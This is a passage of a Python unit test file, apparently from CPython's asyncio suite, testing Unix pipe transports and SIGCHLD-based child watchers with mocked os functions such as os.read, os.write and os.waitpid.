with mock.patch('os.sendfile', side_effect=err):
self.loop._sock_sendfile_native_impl(fut, sock.fileno(),
sock, fileno,
1000, None, len(self.DATA),
1000)
with self.assertRaises(KeyError):
self.loop._selector.get_key(sock)
exc = fut.exception()
self.assertIs(exc, err)
self.assertEqual(1000, self.file.tell())
class UnixReadPipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.Protocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFIFO
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def read_pipe_transport(self, waiter=None):
transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = self.loop.create_future()
tr = self.read_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertIsNone(waiter.result())
@mock.patch('os.read')
def test__read_ready(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b'data'
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.protocol.data_received.assert_called_with(b'data')
@mock.patch('os.read')
def test__read_ready_eof(self, m_read):
tr = self.read_pipe_transport()
m_read.return_value = b''
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.eof_received.assert_called_with()
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.read')
def test__read_ready_blocked(self, m_read):
tr = self.read_pipe_transport()
m_read.side_effect = BlockingIOError
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
test_utils.run_briefly(self.loop)
self.assertFalse(self.protocol.data_received.called)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.read')
def test__read_ready_error(self, m_read, m_logexc):
tr = self.read_pipe_transport()
err = OSError()
m_read.side_effect = err
tr._close = mock.Mock()
tr._read_ready()
m_read.assert_called_with(5, tr.max_size)
tr._close.assert_called_with(err)
m_logexc.assert_called_with(
test_utils.MockPattern(
'Fatal read error on pipe transport'
'\nprotocol:.*\ntransport:.*'),
exc_info=(OSError, MOCK_ANY, MOCK_ANY))
@mock.patch('os.read')
def test_pause_reading(self, m_read):
tr = self.read_pipe_transport()
m = mock.Mock()
self.loop.add_reader(5, m)
tr.pause_reading()
self.assertFalse(self.loop.readers)
@mock.patch('os.read')
def test_resume_reading(self, m_read):
tr = self.read_pipe_transport()
tr.pause_reading()
tr.resume_reading()
self.loop.assert_reader(5, tr._read_ready)
@mock.patch('os.read')
def test_close(self, m_read):
tr = self.read_pipe_transport()
tr._close = mock.Mock()
tr.close()
tr._close.assert_called_with(None)
@mock.patch('os.read')
def test_close_already_closing(self, m_read):
tr = self.read_pipe_transport()
tr._closing = True
tr._close = mock.Mock()
tr.close()
self.assertFalse(tr._close.called)
@mock.patch('os.read')
def test__close(self, m_read):
tr = self.read_pipe_transport()
err = object()
tr._close(err)
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
def test__call_connection_lost(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.read_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_pause_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.pause_reading()
def test_pause_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
tr.pause_reading()
# the second call should do nothing
tr.pause_reading()
def test_resume_reading_on_closed_pipe(self):
tr = self.read_pipe_transport()
tr.close()
test_utils.run_briefly(self.loop)
self.assertIsNone(tr._loop)
tr.resume_reading()
def test_resume_reading_on_paused_pipe(self):
tr = self.read_pipe_transport()
# the pipe is not paused
# resuming should do nothing
tr.resume_reading()
class UnixWritePipeTransportTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
self.pipe = mock.Mock(spec_set=io.RawIOBase)
self.pipe.fileno.return_value = 5
blocking_patcher = mock.patch('os.set_blocking')
blocking_patcher.start()
self.addCleanup(blocking_patcher.stop)
fstat_patcher = mock.patch('os.fstat')
m_fstat = fstat_patcher.start()
st = mock.Mock()
st.st_mode = stat.S_IFSOCK
m_fstat.return_value = st
self.addCleanup(fstat_patcher.stop)
def write_pipe_transport(self, waiter=None):
transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
self.protocol,
waiter=waiter)
self.addCleanup(close_pipe_transport, transport)
return transport
def test_ctor(self):
waiter = self.loop.create_future()
tr = self.write_pipe_transport(waiter=waiter)
self.loop.run_until_complete(waiter)
self.protocol.connection_made.assert_called_with(tr)
self.loop.assert_reader(5, tr._read_ready)
self.assertEqual(None, waiter.result())
def test_can_write_eof(self):
tr = self.write_pipe_transport()
self.assertTrue(tr.can_write_eof())
@mock.patch('os.write')
def test_write(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 4
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test_write_no_data(self, m_write):
tr = self.write_pipe_transport()
tr.write(b'')
self.assertFalse(m_write.called)
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(b''), tr._buffer)
@mock.patch('os.write')
def test_write_partial(self, m_write):
tr = self.write_pipe_transport()
m_write.return_value = 2
tr.write(b'data')
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'ta'), tr._buffer)
@mock.patch('os.write')
def test_write_buffer(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'previous')
tr.write(b'data')
self.assertFalse(m_write.called)
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'previousdata'), tr._buffer)
@mock.patch('os.write')
def test_write_again(self, m_write):
tr = self.write_pipe_transport()
m_write.side_effect = BlockingIOError()
tr.write(b'data')
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.unix_events.logger')
@mock.patch('os.write')
def test_write_err(self, m_write, m_log):
tr = self.write_pipe_transport()
err = OSError()
m_write.side_effect = err
tr._fatal_error = mock.Mock()
tr.write(b'data')
m_write.assert_called_with(5, b'data')
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
tr._fatal_error.assert_called_with(
err,
'Fatal write error on pipe transport')
self.assertEqual(1, tr._conn_lost)
tr.write(b'data')
self.assertEqual(2, tr._conn_lost)
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
tr.write(b'data')
# This is a bit overspecified. :-(
m_log.warning.assert_called_with(
'pipe closed by peer or os.write(pipe, data) raised exception.')
tr.close()
@mock.patch('os.write')
def test_write_close(self, m_write):
tr = self.write_pipe_transport()
tr._read_ready() # pipe was closed by peer
tr.write(b'data')
self.assertEqual(tr._conn_lost, 1)
tr.write(b'data')
self.assertEqual(tr._conn_lost, 2)
def test__read_ready(self):
tr = self.write_pipe_transport()
tr._read_ready()
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
@mock.patch('os.write')
def test__write_ready(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertEqual(bytearray(), tr._buffer)
@mock.patch('os.write')
def test__write_ready_partial(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 3
tr._write_ready()
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'a'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_again(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = BlockingIOError()
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('os.write')
def test__write_ready_empty(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.return_value = 0
tr._write_ready()
m_write.assert_called_with(5, bytearray(b'data'))
self.loop.assert_writer(5, tr._write_ready)
self.assertEqual(bytearray(b'data'), tr._buffer)
@mock.patch('asyncio.log.logger.error')
@mock.patch('os.write')
def test__write_ready_err(self, m_write, m_logexc):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._buffer = bytearray(b'data')
m_write.side_effect = err = OSError()
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.assertTrue(tr.is_closing())
m_logexc.assert_not_called()
self.assertEqual(1, tr._conn_lost)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(err)
@mock.patch('os.write')
def test__write_ready_closing(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
tr._closing = True
tr._buffer = bytearray(b'data')
m_write.return_value = 4
tr._write_ready()
self.assertFalse(self.loop.writers)
self.assertFalse(self.loop.readers)
self.assertEqual(bytearray(), tr._buffer)
self.protocol.connection_lost.assert_called_with(None)
self.pipe.close.assert_called_with()
@mock.patch('os.write')
def test_abort(self, m_write):
tr = self.write_pipe_transport()
self.loop.add_writer(5, tr._write_ready)
self.loop.add_reader(5, tr._read_ready)
tr._buffer = [b'da', b'ta']
tr.abort()
self.assertFalse(m_write.called)
self.assertFalse(self.loop.readers)
self.assertFalse(self.loop.writers)
self.assertEqual([], tr._buffer)
self.assertTrue(tr.is_closing())
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test__call_connection_lost(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = None
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test__call_connection_lost_with_err(self):
tr = self.write_pipe_transport()
self.assertIsNotNone(tr._protocol)
self.assertIsNotNone(tr._loop)
err = OSError()
tr._call_connection_lost(err)
self.protocol.connection_lost.assert_called_with(err)
self.pipe.close.assert_called_with()
self.assertIsNone(tr._protocol)
self.assertIsNone(tr._loop)
def test_close(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr.close()
tr.write_eof.assert_called_with()
# closing the transport twice must not fail
tr.close()
def test_close_closing(self):
tr = self.write_pipe_transport()
tr.write_eof = mock.Mock()
tr._closing = True
tr.close()
self.assertFalse(tr.write_eof.called)
def test_write_eof(self):
tr = self.write_pipe_transport()
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.loop.readers)
test_utils.run_briefly(self.loop)
self.protocol.connection_lost.assert_called_with(None)
def test_write_eof_pending(self):
tr = self.write_pipe_transport()
tr._buffer = [b'data']
tr.write_eof()
self.assertTrue(tr.is_closing())
self.assertFalse(self.protocol.connection_lost.called)
class AbstractChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = asyncio.AbstractChildWatcher()
self.assertRaises(
NotImplementedError, watcher.add_child_handler, f, f)
self.assertRaises(
NotImplementedError, watcher.remove_child_handler, f)
self.assertRaises(
NotImplementedError, watcher.attach_loop, f)
self.assertRaises(
NotImplementedError, watcher.close)
self.assertRaises(
NotImplementedError, watcher.is_active)
self.assertRaises(
NotImplementedError, watcher.__enter__)
self.assertRaises(
NotImplementedError, watcher.__exit__, f, f, f)
class BaseChildWatcherTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
watcher = unix_events.BaseChildWatcher()
self.assertRaises(
NotImplementedError, watcher._do_waitpid, f)
WaitPidMocks = collections.namedtuple("WaitPidMocks",
("waitpid",
"WIFEXITED",
"WIFSIGNALED",
"WEXITSTATUS",
"WTERMSIG",
))
class ChildWatcherTestsMixin:
ignore_warnings = mock.patch.object(log.logger, "warning")
def setUp(self):
super().setUp()
self.loop = self.new_test_loop()
self.running = False
self.zombies = {}
with mock.patch.object(
self.loop, "add_signal_handler") as self.m_add_signal_handler:
self.watcher = self.create_watcher()
self.watcher.attach_loop(self.loop)
def waitpid(self, pid, flags):
if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
self.assertGreater(pid, 0)
try:
if pid < 0:
return self.zombies.popitem()
else:
return pid, self.zombies.pop(pid)
except KeyError:
pass
if self.running:
return 0, 0
else:
raise ChildProcessError()
def add_zombie(self, pid, returncode):
self.zombies[pid] = returncode + 32768
def WIFEXITED(self, status):
return status >= 32768
def WIFSIGNALED(self, status):
return 32700 < status < 32768
def WEXITSTATUS(self, status):
self.assertTrue(self.WIFEXITED(status))
return status - 32768
def WTERMSIG(self, status):
self.assertTrue(self.WIFSIGNALED(status))
return 32768 - status
def test_create_watcher(self):
self.m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
def waitpid_mocks(func):
def wrapped_func(self):
def patch(target, wrapper):
return mock.patch(target, wraps=wrapper,
new_callable=mock.Mock)
with patch('os.WTERMSIG', self.WTERMSIG) as m_WTERMSIG, \
patch('os.WEXITSTATUS', self.WEXITSTATUS) as m_WEXITSTATUS, \
patch('os.WIFSIGNALED', self.WIFSIGNALED) as m_WIFSIGNALED, \
patch('os.WIFEXITED', self.WIFEXITED) as m_WIFEXITED, \
patch('os.waitpid', self.waitpid) as m_waitpid:
func(self, WaitPidMocks(m_waitpid,
m_WIFEXITED, m_WIFSIGNALED,
m_WEXITSTATUS, m_WTERMSIG,
))
return wrapped_func
@waitpid_mocks
def test_sigchld(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(42, callback, 9, 10, 14)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child is running
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (returncode 12)
self.running = False
self.add_zombie(42, 12)
self.watcher._sig_chld()
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.assert_called_once_with(42, 12, 9, 10, 14)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(42, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(43, callback1, 7, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(44, callback2, 147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (signal 3)
self.add_zombie(43, -3)
self.watcher._sig_chld()
callback1.assert_called_once_with(43, -3, 7, 8)
self.assertFalse(callback2.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback1.reset_mock()
# child 2 still running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 2 terminates (code 108)
self.add_zombie(44, 108)
self.running = False
self.watcher._sig_chld()
callback2.assert_called_once_with(44, 108, 147, 18)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(43, 14)
self.add_zombie(44, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WEXITSTATUS.reset_mock()
# sigchld called again
self.zombies.clear()
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_two_children_terminating_together(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register child 1
with self.watcher:
self.running = True
self.watcher.add_child_handler(45, callback1, 17, 8)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register child 2
with self.watcher:
self.watcher.add_child_handler(46, callback2, 1147, 18)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# children are running
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child 1 terminates (code 78)
# child 2 terminates (signal 5)
self.add_zombie(45, 78)
self.add_zombie(46, -5)
self.running = False
self.watcher._sig_chld()
callback1.assert_called_once_with(45, 78, 17, 8)
callback2.assert_called_once_with(46, -5, 1147, 18)
self.assertTrue(m.WIFSIGNALED.called)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
m.WEXITSTATUS.reset_mock()
callback1.reset_mock()
callback2.reset_mock()
# ensure that the children are effectively reaped
self.add_zombie(45, 14)
self.add_zombie(46, 15)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_race_condition(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
# child terminates before being registered
self.add_zombie(50, 4)
self.watcher._sig_chld()
self.watcher.add_child_handler(50, callback, 1, 12)
callback.assert_called_once_with(50, 4, 1, 12)
callback.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(50, -1)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_replace_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(51, callback1, 19)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# register the same child again
with self.watcher:
self.watcher.add_child_handler(51, callback2, 21)
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (signal 8)
self.running = False
self.add_zombie(51, -8)
self.watcher._sig_chld()
callback2.assert_called_once_with(51, -8, 21)
self.assertFalse(callback1.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertTrue(m.WTERMSIG.called)
m.WIFSIGNALED.reset_mock()
m.WIFEXITED.reset_mock()
m.WTERMSIG.reset_mock()
callback2.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(51, 13)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(m.WTERMSIG.called)
@waitpid_mocks
def test_sigchld_remove_handler(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(52, callback, 1984)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# unregister the child
self.watcher.remove_child_handler(52)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates (code 99)
self.running = False
self.add_zombie(52, 99)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_sigchld_unknown_status(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(53, callback, -19)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# terminate with unknown status
self.zombies[53] = 1178
self.running = False
self.watcher._sig_chld()
callback.assert_called_once_with(53, 1178, -19)
self.assertTrue(m.WIFEXITED.called)
self.assertTrue(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
callback.reset_mock()
m.WIFEXITED.reset_mock()
m.WIFSIGNALED.reset_mock()
# ensure that the child is effectively reaped
self.add_zombie(53, 101)
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback.called)
@waitpid_mocks
def test_remove_child_handler(self, m):
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
# register children
with self.watcher:
self.running = True
self.watcher.add_child_handler(54, callback1, 1)
self.watcher.add_child_handler(55, callback2, 2)
self.watcher.add_child_handler(56, callback3, 3)
# remove child handler 1
self.assertTrue(self.watcher.remove_child_handler(54))
# remove child handler 2 multiple times
self.assertTrue(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
self.assertFalse(self.watcher.remove_child_handler(55))
# all children terminate
self.add_zombie(54, 0)
self.add_zombie(55, 1)
self.add_zombie(56, 2)
self.running = False
with self.ignore_warnings:
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(56, 2, 3)
@waitpid_mocks
def test_sigchld_unhandled_exception(self, m):
callback = mock.Mock()
# register a child
with self.watcher:
self.running = True
self.watcher.add_child_handler(57, callback)
# raise an exception
m.waitpid.side_effect = ValueError
with mock.patch.object(log.logger,
'error') as m_error:
self.assertEqual(self.watcher._sig_chld(), None)
self.assertTrue(m_error.called)
@waitpid_mocks
def test_sigchld_child_reaped_elsewhere(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(58, callback)
self.assertFalse(callback.called)
self.assertFalse(m.WIFEXITED.called)
self.assertFalse(m.WIFSIGNALED.called)
self.assertFalse(m.WEXITSTATUS.called)
self.assertFalse(m.WTERMSIG.called)
# child terminates
self.running = False
self.add_zombie(58, 4)
# waitpid is called elsewhere
os.waitpid(58, os.WNOHANG)
m.waitpid.reset_mock()
# sigchld
with self.ignore_warnings:
self.watcher._sig_chld()
if isinstance(self.watcher, asyncio.FastChildWatcher):
# here the FastChildWatche enters a deadlock
# (there is no way to prevent it)
self.assertFalse(callback.called)
else:
callback.assert_called_once_with(58, 255)
@waitpid_mocks
def test_sigchld_unknown_pid_during_registration(self, m):
# register two children
callback1 = mock.Mock()
callback2 = mock.Mock()
with self.ignore_warnings, self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(591, 7)
# an unknown child terminates
self.add_zombie(593, 17)
self.watcher._sig_chld()
self.watcher.add_child_handler(591, callback1)
self.watcher.add_child_handler(592, callback2)
callback1.assert_called_once_with(591, 7)
self.assertFalse(callback2.called)
@waitpid_mocks
def test_set_loop(self, m):
# register a child
callback = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(60, callback)
# attach a new loop
old_loop = self.loop
self.loop = self.new_test_loop()
patch = mock.patch.object
with patch(old_loop, "remove_signal_handler") as m_old_remove, \
patch(self.loop, "add_signal_handler") as m_new_add:
self.watcher.attach_loop(self.loop)
m_old_remove.assert_called_once_with(
signal.SIGCHLD)
m_new_add.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
# child terminates
self.running = False
self.add_zombie(60, 9)
self.watcher._sig_chld()
callback.assert_called_once_with(60, 9)
@waitpid_mocks
def test_set_loop_race_condition(self, m):
# register 3 children
callback1 = mock.Mock()
callback2 = mock.Mock()
callback3 = mock.Mock()
with self.watcher:
self.running = True
self.watcher.add_child_handler(61, callback1)
self.watcher.add_child_handler(62, callback2)
self.watcher.add_child_handler(622, callback3)
# detach the loop
old_loop = self.loop
self.loop = None
with mock.patch.object(
old_loop, "remove_signal_handler") as m_remove_signal_handler:
with self.assertWarnsRegex(
RuntimeWarning, 'A loop is being detached'):
self.watcher.attach_loop(None)
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
# child 1 & 2 terminate
self.add_zombie(61, 11)
self.add_zombie(62, -5)
# SIGCHLD was not caught
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
self.assertFalse(callback3.called)
# attach a new loop
self.loop = self.new_test_loop()
with mock.patch.object(
self.loop, "add_signal_handler") as m_add_signal_handler:
self.watcher.attach_loop(self.loop)
m_add_signal_handler.assert_called_once_with(
signal.SIGCHLD, self.watcher._sig_chld)
callback1.assert_called_once_with(61, 11) # race condition!
callback2.assert_called_once_with(62, -5) # race condition!
self.assertFalse(callback3.called)
callback1.reset_mock()
callback2.reset_mock()
# child 3 terminates
self.running = False
self.add_zombie(622, 19)
self.watcher._sig_chld()
self.assertFalse(callback1.called)
self.assertFalse(callback2.called)
callback3.assert_called_once_with(622, 19)
@waitpid_mocks
def test_close(self, m):
# register two children
callback1 = mock.Mock()
with self.watcher:
self.running = True
# child 1 terminates
self.add_zombie(63, 9)
# other child terminates
self.add_zombie(65, 18)
self.watcher._sig_chld()
self.watcher.add_child_handler(63, callback1)
self.watcher.add_child_handler(64, callback1)
self.assertEqual(len(self.watcher._callbacks), 1)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertEqual(len(self.watcher._zombies), 1)
with mock.patch.object(
self.loop,
"remove_signal_handler") as m_remove_signal_handler:
self.watcher.close()
m_remove_signal_handler.assert_called_once_with(
signal.SIGCHLD)
self.assertFalse(self.watcher._callbacks)
if isinstance(self.watcher, asyncio.FastChildWatcher):
self.assertFalse(self.watcher._zombies)
class SafeChildWatcherTests (ChildWatcherTestsMixin, test_utils.TestCase):
def create_watcher(self):
return asyncio.SafeChildWatcher()
